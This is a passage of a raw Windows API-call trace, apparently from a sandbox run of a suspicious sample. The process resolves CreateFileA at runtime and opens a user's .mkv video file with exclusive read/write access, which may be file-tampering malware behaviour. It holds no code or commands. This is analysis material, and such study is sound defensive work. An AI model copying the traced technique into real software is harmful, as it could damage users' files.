Size=0x10) returned 0x88cbb0 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.891] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8897c0 [0043.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8897c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.891] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0043.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8897c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.892] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c) returned 0x7ab260 [0043.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", cchWideChar=60, lpMultiByteStr=0x7ab260, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpUsedDefaultChar=0x0) returned 60 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.893] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\s u.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x78) returned 0x7800d0 [0043.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=60, lpWideCharStr=0x7800d0, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv") returned 60 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.895] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.896] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.896] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0043.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.896] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.897] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0043.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", 